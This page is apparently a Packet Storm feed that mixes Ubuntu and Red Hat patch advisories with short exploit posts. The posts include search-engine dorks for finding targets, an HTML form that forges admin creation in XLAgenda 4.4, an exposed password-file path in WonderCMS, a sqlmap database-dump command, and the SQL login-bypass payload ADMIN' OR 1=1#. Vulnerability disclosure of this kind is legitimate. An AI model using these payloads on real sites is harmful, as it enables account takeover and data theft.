XLAgenda version 4.4 suffers from a cross site request forgery vulnerability.

    ====================================================================================================================================| # Title     : XLAgenda v4.4 CSRF Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://xavier.lequere.net/xlagenda/                                                                               |  | # Dork      : "Propulsé par XLAgenda 4.4"                                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin.[+] Go to the line 12.[+] Set the target site link Save changes and apply. [+] infected file : /install/install2.php.[+] http://127.0.0.1/xlagenda44/install/install2.php[+] save code as poc.html .<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>XLAgenda 4.4 | Installation</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><link href="style.css" rel="stylesheet" type="text/css" /></head><body><h1>Installation - Etape 2/3</h1><p class="confirmation">Les tables ont été créées avec succès dans votre base de données.</p><form name="form1" method="post" action="http://127.0.0.1/xlagenda44/install/install2.php">  <h3>Choisissez un nom d'utilisateur et un mot de passe d'administration</h3>  <p>    <label for="user">Nom d'utilisateur :</label><br>    <input name="user" type="text" id="user" value="" maxlength="20" size="30" /> *<br>    (20 caractères maximum)  </p>  <p>    <label for="pass">Mot de passe :</label><br>    <input name="pass" type="password" id="pass" maxlength="15" size="30" /> *<br>    (6 à 15 caractères)  </p>  <p>    <label for="pass2">Introduisez à nouveau le mot de passe :</label><br>    <input name="pass2" type="password" id="pass2" maxlength="15" size="30" /> *  </p>  <p>    <label for="nom">Nom :</label><br>    <input name="nom" type="text" id="nom" value="" size="30" />  </p>  <p>    <label for="prenom">Prénom :</label><br>     <input name="prenom" type="text" id="prenom" value="" size="30" />  </p>  <p>    <label for="email">Adresse email :</label><br>    <input name="email" type="text" id="email" value="" size="30" /> *  </p>  <p>    Les champs marqués d'un * sont obligatoires.<br>    Votre adresse email n'appara&icirc;tra pas sur l'agenda mais est nécessaire pour vous permettre de récupérer votre mot de passe si vous l'avez oublié.  </p>  <p style="text-align:center;">   <input type="submit" name="Submit" value="Continuer >>" />  </p></form></body></html>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

XLAgenda 4.4 Cross Site Request Forgery

WonderCMS version 0.6-Beta suffers from a password disclosure vulnerability.

    ====================================================================================================================================| # Title     : WonderCMS v0.6-Beta Password Disclosure Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://wondercms.com/                                                                                              || # Dork      : ©2015 Your website | Powered by WonderCMS | Login                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] /files/password[+] http://127.0.0.1/wondercms/files/passwordGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WonderCMS 0.6-Beta Password Disclosure

xForUp Simple File Uploader version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : xForUp simple file uploader V1.0 Sql injection Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : https://github.com/munafaqeelmahdi/xForUp-simple-file-uploader-with-php                                            |  ====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  http://127.0.0.1/pages.php?page=17 <======| inject here[+]  Panel : http://127.0.0.1/admin/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

xForUp Simple File Uploader 1.0 SQL Injection

Ubuntu Security Notice 6257-1 - It was discovered that Open VM Tools incorrectly handled certain authentication requests. A fully compromised ESXi host can force Open VM Tools to fail to authenticate host-to-guest operations, impacting the confidentiality and integrity of the guest virtual machine.

==========================================================================  
Ubuntu Security Notice USN-6257-1  
July 27, 2023

open-vm-tools vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

open-vm-tools could be made to bypass authentication.

Software Description:  
- open-vm-tools: Open VMware Tools for virtual machines hosted on VMware

Details:

It was discovered that Open VM Tools incorrectly handled certain  
authentication requests. A fully compromised ESXi host can force Open VM  
Tools to fail to authenticate host-to-guest operations, impacting the  
confidentiality and integrity of the guest virtual machine. (CVE-2023-20867)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  open-vm-tools                   2:12.1.5-3ubuntu0.23.04.1

Ubuntu 22.04 LTS:  
  open-vm-tools                   2:12.1.5-3~ubuntu0.22.04.2

Ubuntu 20.04 LTS:  
  open-vm-tools                   2:11.3.0-2ubuntu0~ubuntu20.04.5

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  open-vm-tools                   2:11.0.5-4ubuntu0.18.04.3+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  open-vm-tools                   2:10.2.0-3~ubuntu0.16.04.1+esm2

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6257-1  
  CVE-2023-20867

Package Information:  
  https://launchpad.net/ubuntu/+source/open-vm-tools/2:12.1.5-3ubuntu0.23.04.1  
  https://launchpad.net/ubuntu/+source/open-vm-tools/2:12.1.5-3~ubuntu0.22.04.2  
  https://launchpad.net/ubuntu/+source/open-vm-tools/2:11.3.0-2ubuntu0~ubuntu20.04.5

Ubuntu Security Notice USN-6257-1

Ubuntu Security Notice 6256-1 - Jiasheng Jiang discovered that the HSA Linux kernel driver for AMD Radeon GPU devices did not properly validate memory allocation in certain situations, leading to a null pointer dereference vulnerability. A local attacker could use this to cause a denial of service. Zheng Wang discovered that the Intel i915 graphics driver in the Linux kernel did not properly handle certain error conditions, leading to a double-free. A local attacker could possibly use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6256-1  
July 26, 2023

linux-iot vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTSubuntu-security-announce@lists.ubuntu.com

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-iot: Linux kernel for IoT platforms

Details:

Jiasheng Jiang discovered that the HSA Linux kernel driver for AMD Radeon  
GPU devices did not properly validate memory allocation in certain  
situations, leading to a null pointer dereference vulnerability. A local  
attacker could use this to cause a denial of service (system crash).  
(CVE-2022-3108)

Zheng Wang discovered that the Intel i915 graphics driver in the Linux  
kernel did not properly handle certain error conditions, leading to a  
double-free. A local attacker could possibly use this to cause a denial of  
service (system crash). (CVE-2022-3707)

It was discovered that the infrared transceiver USB driver did not properly  
handle USB control messages. A local attacker with physical access could  
plug in a specially crafted USB device to cause a denial of service (memory  
exhaustion). (CVE-2022-3903)

Haowei Yan discovered that a race condition existed in the Layer 2  
Tunneling Protocol (L2TP) implementation in the Linux kernel. A local  
attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2022-4129)

Jordy Zomer and Alexandra Sandulescu discovered that syscalls invoking the  
do_prlimit() function in the Linux kernel did not properly handle  
speculative execution barriers. A local attacker could use this to expose  
sensitive information (kernel memory). (CVE-2023-0458)

Jordy Zomer and Alexandra Sandulescu discovered that the Linux kernel did  
not properly implement speculative execution barriers in usercopy functions  
in certain situations. A local attacker could use this to expose sensitive  
information (kernel memory). (CVE-2023-0459)

It was discovered that the Human Interface Device (HID) support driver in  
the Linux kernel contained a type confusion vulnerability in some  
situations. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-1073)

It was discovered that a memory leak existed in the SCTP protocol  
implementation in the Linux kernel. A local attacker could use this to  
cause a denial of service (memory exhaustion). (CVE-2023-1074)

It was discovered that the TLS subsystem in the Linux kernel contained a  
type confusion vulnerability in some situations. A local attacker could use  
this to cause a denial of service (system crash) or possibly expose  
sensitive information. (CVE-2023-1075)

It was discovered that the TUN/TAP driver in the Linux kernel did not  
properly initialize socket data. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2023-1076)

It was discovered that the Real-Time Scheduling Class implementation in the  
Linux kernel contained a type confusion vulnerability in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-1077)

It was discovered that the Reliable Datagram Sockets (RDS) protocol  
implementation in the Linux kernel contained a type confusion vulnerability  
in some situations. An attacker could use this to cause a denial of service  
(system crash). (CVE-2023-1078)

It was discovered that the ASUS HID driver in the Linux kernel did not  
properly handle device removal, leading to a use-after-free vulnerability.  
A local attacker with physical access could plug in a specially crafted USB  
device to cause a denial of service (system crash). (CVE-2023-1079)

Duoming Zhou discovered that a race condition existed in the infrared  
receiver/transceiver driver in the Linux kernel, leading to a use-after-  
free vulnerability. A privileged attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-1118)

It was discovered that the Traffic-Control Index (TCINDEX) implementation  
in the Linux kernel contained a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-1281)

It was discovered that the Broadcom FullMAC USB WiFi driver in the Linux  
kernel did not properly perform data buffer size validation in some  
situations. A physically proximate attacker could use this to craft a  
malicious USB device that when inserted, could cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-1380)

Xingyuan Mo discovered that the x86 KVM implementation in the Linux kernel  
did not properly initialize some data structures. A local attacker could  
use this to expose sensitive information (kernel memory). (CVE-2023-1513)

It was discovered that the Xircom PCMCIA network device driver in the Linux  
kernel did not properly handle device removal events. A physically  
proximate attacker could use this to cause a denial of service (system  
crash). (CVE-2023-1670)

It was discovered that the Traffic-Control Index (TCINDEX) implementation  
in the Linux kernel did not properly perform filter deactivation in some  
situations. A local attacker could possibly use this to gain elevated  
privileges. Please note that with the fix for this CVE, kernel support for  
the TCINDEX classifier has been removed. (CVE-2023-1829)

It was discovered that a race condition existed in the Xen transport layer  
implementation for the 9P file system protocol in the Linux kernel, leading  
to a use-after-free vulnerability. A local attacker could use this to cause  
a denial of service (guest crash) or expose sensitive information (guest  
kernel memory). (CVE-2023-1859)

Jose Oliveira and Rodrigo Branco discovered that the Spectre Variant 2  
mitigations with prctl syscall were insufficient in some situations. A  
local attacker could possibly use this to expose sensitive information.  
(CVE-2023-1998)

It was discovered that a use-after-free vulnerability existed in the iSCSI  
TCP implementation in the Linux kernel. A local attacker could possibly use  
this to cause a denial of service (system crash). (CVE-2023-2162)

It was discovered that the BigBen Interactive Kids' gamepad driver in the  
Linux kernel did not properly handle device removal, leading to a use-  
after-free vulnerability. A local attacker with physical access could plug  
in a specially crafted USB device to cause a denial of service (system  
crash). (CVE-2023-25012)

Jean-Baptiste Cayrou discovered that the shiftfs file system in the Ubuntu  
Linux kernel contained a race condition when handling inode locking in some  
situations. A local attacker could use this to cause a denial of service  
(kernel deadlock). (CVE-2023-2612)

Lianhui Tang discovered that the MPLS implementation in the Linux kernel  
did not properly handle certain sysctl allocation failure conditions,  
leading to a double-free vulnerability. An attacker could use this to cause  
a denial of service or possibly execute arbitrary code. (CVE-2023-26545)

It was discovered that a use-after-free vulnerability existed in the HFS+  
file system implementation in the Linux kernel. A local attacker could  
possibly use this to cause a denial of service (system crash).  
(CVE-2023-2985)

Reima Ishii discovered that the nested KVM implementation for Intel x86  
processors in the Linux kernel did not properly validate control registers  
in certain situations. An attacker in a guest VM could use this to cause a  
denial of service (guest crash). (CVE-2023-30456)

Gwangun Jung discovered that the Quick Fair Queueing scheduler  
implementation in the Linux kernel contained an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-31436)

Sanan Hasanov discovered that the framebuffer console driver in the Linux  
kernel did not properly perform checks for font dimension limits. A local  
attacker could use this to cause a denial of service (system crash).  
(CVE-2023-3161)

Patryk Sondej and Piotr Krysiuk discovered that a race condition existed in  
the netfilter subsystem of the Linux kernel when processing batch requests,  
leading to a use-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-32233)

It was discovered that the NET/ROM protocol implementation in the Linux  
kernel contained a race condition in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-32269)

Hangyu Hua discovered that the Flower classifier implementation in the  
Linux kernel contained an out-of-bounds write vulnerability. An attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-35788)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1017-iot      5.4.0-1017.18

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6256-1  
   CVE-2022-3108, CVE-2022-3707, CVE-2022-3903, CVE-2022-4129,  
   CVE-2023-0458, CVE-2023-0459, CVE-2023-1073, CVE-2023-1074,  
   CVE-2023-1075, CVE-2023-1076, CVE-2023-1077, CVE-2023-1078,  
   CVE-2023-1079, CVE-2023-1118, CVE-2023-1281, CVE-2023-1380,  
   CVE-2023-1513, CVE-2023-1670, CVE-2023-1829, CVE-2023-1859,  
   CVE-2023-1998, CVE-2023-2162, CVE-2023-25012, CVE-2023-2612,  
   CVE-2023-26545, CVE-2023-2985, CVE-2023-30456, CVE-2023-31436,  
   CVE-2023-3161, CVE-2023-32233, CVE-2023-32269, CVE-2023-35788

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-iot/5.4.0-1017.18

Ubuntu Security Notice USN-6256-1

B-OBEC version V.092019 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : B-OBEC V.092019 SQL injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://bobec.bopp-obec.info/                                                                                      |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /area_user.php?Area_CODE=1001[+] D:\sqlmap>sqlmap.py -u https://target_site/area_user.php?Area_CODE=1001 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbsGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

B-OBEC V.092019 SQL Injection

BMIT BMS version 2.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : BMIT BMS 2.1 Auth BY Pass Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.bmitsolution.in/softtware_development.php                                                              |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass : ADMIN' OR 1=1#[+] http://127.0.0.1/wwrbsgroupofinstitutioncom/admin/index.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

BMIT BMS 2.1 SQL Injection

Ubuntu Security Notice 6255-1 - It was discovered that the IP-VLAN network driver for the Linux kernel did not properly initialize memory in some situations, leading to an out-of- bounds write vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. Mingi Cho discovered that the netfilter subsystem in the Linux kernel did not properly validate the status of a nft chain while performing a lookup by id, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6255-1July 26, 2023linux-intel-iotg-5.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-intel-iotg-5.15: Linux kernel for Intel IoT platformsDetails:It was discovered that the IP-VLAN network driver for the Linux kernel didnot properly initialize memory in some situations, leading to an out-of-bounds write vulnerability. An attacker could use this to cause a denial ofservice (system crash) or possibly execute arbitrary code. (CVE-2023-3090)Mingi Cho discovered that the netfilter subsystem in the Linux kernel didnot properly validate the status of a nft chain while performing a lookupby id, leading to a use-after-free vulnerability. An attacker could usethis to cause a denial of service (system crash) or possibly executearbitrary code. (CVE-2023-31248)Querijn Voet discovered that a race condition existed in the io_uringsubsystem in the Linux kernel, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-3389)It was discovered that the netfilter subsystem in the Linux kernel did notproperly handle some error conditions, leading to a use-after-freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-3390)Lin Ma discovered that a race condition existed in the MCTP implementationin the Linux kernel, leading to a use-after-free vulnerability. Aprivileged attacker could use this to cause a denial of service (systemcrash) or possibly execute arbitrary code. (CVE-2023-3439)Tanguy Dubroca discovered that the netfilter subsystem in the Linux kerneldid not properly handle certain pointer data type, leading to an out-of-bounds write vulnerability. A privileged attacker could use this to cause adenial of service (system crash) or possibly execute arbitrary code.(CVE-2023-35001)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.15.0-1036-intel-iotg  5.15.0-1036.41~20.04.1   linux-image-intel               5.15.0.1036.41~20.04.26   linux-image-intel-iotg          5.15.0.1036.41~20.04.26After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6255-1   CVE-2023-3090, CVE-2023-31248, CVE-2023-3389, CVE-2023-3390,   CVE-2023-3439, CVE-2023-35001Package Information: https://launchpad.net/ubuntu/+source/linux-intel-iotg-5.15/5.15.0-1036.41~20.04.1

Ubuntu Security Notice USN-6255-1

Red Hat Security Advisory 2023-4290-01 - OpenShift sandboxed containers 1.4.1 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A compliance problem was found in the Red Hat OpenShift Container Platform. Red Hat discovered that when FIPS mode was enabled, not all of the cryptographic modules in use were FIPS-validated.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift sandboxed containers 1.4.1 security update  
Advisory ID:       RHSA-2023:4290-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4290  
Issue date:        2023-07-27  
CVE Names:         CVE-2020-24736 CVE-2021-46848 CVE-2022-1271   
                   CVE-2022-1304 CVE-2022-2509 CVE-2022-3715   
                   CVE-2022-28805 CVE-2022-34903 CVE-2022-35737   
                   CVE-2022-36227 CVE-2022-40303 CVE-2022-40304   
                   CVE-2022-47629 CVE-2023-0464 CVE-2023-0465   
                   CVE-2023-0466 CVE-2023-1255 CVE-2023-1667   
                   CVE-2023-2283 CVE-2023-2650 CVE-2023-3089   
                   CVE-2023-24329 CVE-2023-26604   
=====================================================================

1. Summary:

OpenShift sandboxed containers 1.4.1 is now available.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

OpenShift sandboxed containers support for OpenShift Container Platform  
provides users with built-in support for running Kata containers as an  
additional, optional runtime.

This advisory contains a security update for OpenShift sandboxed  
containers, as well as bug fixes.

Security fix:

* A compliance problem was found in the Red Hat OpenShift Container  
Platform. Red Hat discovered that when FIPS mode was enabled, not all of  
the cryptographic modules in use were FIPS-validated. (CVE-2023-3089)

For more information about the additional fixes in this release, see the  
Release Notes documentation:

https://access.redhat.com/documentation/en-us/openshift_sandboxed_containers/1.4/html-single/openshift_sandboxed_containers_release_notes/

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

5. JIRA issues fixed (https://issues.redhat.com/):

KATA-2121 - taints/tolerations from kata-monitor daemonset removed by reconciliation  
KATA-2212 - operator, must-gather, and cloud-api-adapter dockerfiles use ubi8 base images   
KATA-2299 - 1.4.1 build showing 1.4.0 version  
OCPBUGS-15175 - [Major Incident] CVE-2023-3089 osc-operator-container: openshift: OCP & FIPS mode [rhosc-1-4]

6. References:

https://access.redhat.com/security/cve/CVE-2020-24736  
https://access.redhat.com/security/cve/CVE-2021-46848  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-1304  
https://access.redhat.com/security/cve/CVE-2022-2509  
https://access.redhat.com/security/cve/CVE-2022-3715  
https://access.redhat.com/security/cve/CVE-2022-28805  
https://access.redhat.com/security/cve/CVE-2022-34903  
https://access.redhat.com/security/cve/CVE-2022-35737  
https://access.redhat.com/security/cve/CVE-2022-36227  
https://access.redhat.com/security/cve/CVE-2022-40303  
https://access.redhat.com/security/cve/CVE-2022-40304  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/cve/CVE-2023-0464  
https://access.redhat.com/security/cve/CVE-2023-0465  
https://access.redhat.com/security/cve/CVE-2023-0466  
https://access.redhat.com/security/cve/CVE-2023-1255  
https://access.redhat.com/security/cve/CVE-2023-1667  
https://access.redhat.com/security/cve/CVE-2023-2283  
https://access.redhat.com/security/cve/CVE-2023-2650  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/cve/CVE-2023-26604  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/openshift_sandboxed_containers/1.4/html-single/openshift_sandboxed_containers_release_notes/

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkwdRWAAoJENzjgjWX9erEf1cP/1R3va9sDeVZofBGgIFDCJL8  
bIVdeaBrW+4rf+ddy/l2oYHv5Ei4mBAIpICwMtCP1VBt5prx8GzXhQLuwGQKDD3+  
KfmPBIJefIcEMwUyuC8vmtlx3+5bj5Ac/sdDcBwOLhfkxcyP4Ec+bpiKohz6Mjtn  
8CsJoYhDnk7w/SvZYGukCHmghsbAJLVqBOduKSLJkL4kIKIOmd0pNBlo4Ph7aLY5  
YbaT+exB+RstYFkLG63ilfHiExpwAp0zc3H55IQ60to+9IgLwsZ9yyM9lOLiECie  
UTejf1zzISfVfCqVlL6jJc6596QQKkKni4DWsy4CjvS6jV3ukDyelM2ecfZVshma  
gugKuUbhDwZMjbrLgNYGnpQpZYUpBoJbK5JUYvQ/fpNjdxYOFkPQindvy1GSKCvj  
5m0pftOPWQwil4h4d+l3AxyT1fo5evic+/i8EPSZNQbYeV43XrLr0VxZP4uq+Pqw  
T2bQYOBCISu/nwKuUNkBmcLRbpmpdwu+3Y9du0ftqyXr1GPI7C6lcW4HUKDZM/ct  
Z914wsfftCBGWubYIxa+FGDV7k9qkDWVhFtacilNABkwWUJM1p4PSCQmm//Ayymc  
8Jz2Fasgw9+e2hnQeBoVRHRqyQiWfqq59MKXIkNvCW06FEqoIDWJD7+gMEGwXFqh  
qwcw4WUp7UKqlYVP5U4T  
=3TcZ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4290-01

Red Hat Security Advisory 2023-4293-01 - The Migration Toolkit for Containers (MTC) 1.7.11 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Migration Toolkit for Containers (MTC) 1.7.11 security and bug fix update  
Advisory ID:       RHSA-2023:4293-01  
Product:           Red Hat Migration Toolkit  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4293  
Issue date:        2023-07-27  
CVE Names:         CVE-2020-24736 CVE-2022-41723 CVE-2023-1667   
                   CVE-2023-2283 CVE-2023-24329 CVE-2023-24539   
                   CVE-2023-26125 CVE-2023-26604 CVE-2023-29400   
                   CVE-2023-29401   
=====================================================================

1. Summary:

The Migration Toolkit for Containers (MTC) 1.7.11 is now available.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

The Migration Toolkit for Containers (MTC) enables you to migrate  
Kubernetes resources, persistent volume data, and internal container images  
between OpenShift Container Platform clusters, using the MTC web console or  
the Kubernetes API.

Security Fix(es) from Bugzilla:

* net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK  
decoding (CVE-2022-41723)

* golang: html/template: improper sanitization of CSS values  
(CVE-2023-24539)

* golang-github-gin-gonic-gin: Improper Input Validation (CVE-2023-26125)

* golang: html/template: improper handling of empty HTML attributes  
(CVE-2023-29400)

* golang-github-gin-gonic-gin: Gin Web Framework does not properly sanitize  
filename parameter of Context.FileAttachment function (CVE-2023-29401)

For more details about the security issue(s), including the impact, a CVSS  
score, and other related information, refer to the CVE page(s) listed in  
the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2178358 - CVE-2022-41723 net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding  
2196026 - CVE-2023-24539 golang: html/template: improper sanitization of CSS values  
2196029 - CVE-2023-29400 golang: html/template: improper handling of empty HTML attributes  
2203769 - CVE-2023-26125 golang-github-gin-gonic-gin: Improper Input Validation  
2216957 - CVE-2023-29401 golang-github-gin-gonic-gin: Gin Web Framework does not properly sanitize filename parameter of Context.FileAttachment function

5. References:

https://access.redhat.com/security/cve/CVE-2020-24736  
https://access.redhat.com/security/cve/CVE-2022-41723  
https://access.redhat.com/security/cve/CVE-2023-1667  
https://access.redhat.com/security/cve/CVE-2023-2283  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/cve/CVE-2023-24539  
https://access.redhat.com/security/cve/CVE-2023-26125  
https://access.redhat.com/security/cve/CVE-2023-26604  
https://access.redhat.com/security/cve/CVE-2023-29400  
https://access.redhat.com/security/cve/CVE-2023-29401  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkwdRKAAoJENzjgjWX9erETLYP/i0v1WOSwBaVLef7uqjKSG4f  
E70Qv2TsqsrjB51UNUnGP1PjtnSrHSwfA5fN/TBn4vZkSk1pYIH/lpg1RNbvx8ls  
xlKMTd6bX/z4ojHbCss5AIGFxL7zqd9ZTfCfI/NopDVnAIFRDYCWh4rqEtaETBwa  
yioqI3py2XOd3lwSEEnaenLR35rpxt730ZLeZAl5/lvRRt7kD69r9exWAUh4sW6j  
JtYi6ydY8BXg0HNR+nU57XRmp0S6GfYGncYDZFyDRXTT0UMHVxtRF04VETuBjWC2  
IAqp7ocRPt5woh0+HyyRA/9p+QWDP6kYY1Bb8HgKNx3xdQbwJi07Pwt4YadMTmAE  
igw1LmIPRIJoNKTh1MqTL00nJIU/1mO+vpkyvNhIZ94vreLJ8MyQLbLAhJYuTCby  
sLA2VeLnQmcdrsWDIkx+hJOsR9bydCZuIPykN4Nmstv2j6UHWg31DtaHyQQEyZtm  
O/V61KAUYeOd6dMvRYlgz86hvQurwGl/sYsAsIt5mV50wXB14bSfMUnYe3hM1/v3  
vB6bNiPIY8UgpRl2ZnZCsVruPEyFn7+W0wCSqX3Afy5Q08lyvuPFXcD1XAm4TLES  
5g1bNuIDOPu1r/AqKrC7zSVsL0QLjpyetjPnUa205Nc6LqcyfyvV2BC+61VzWm5E  
OTxW8GMl5qshDNCZCUVd  
=0sF0  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm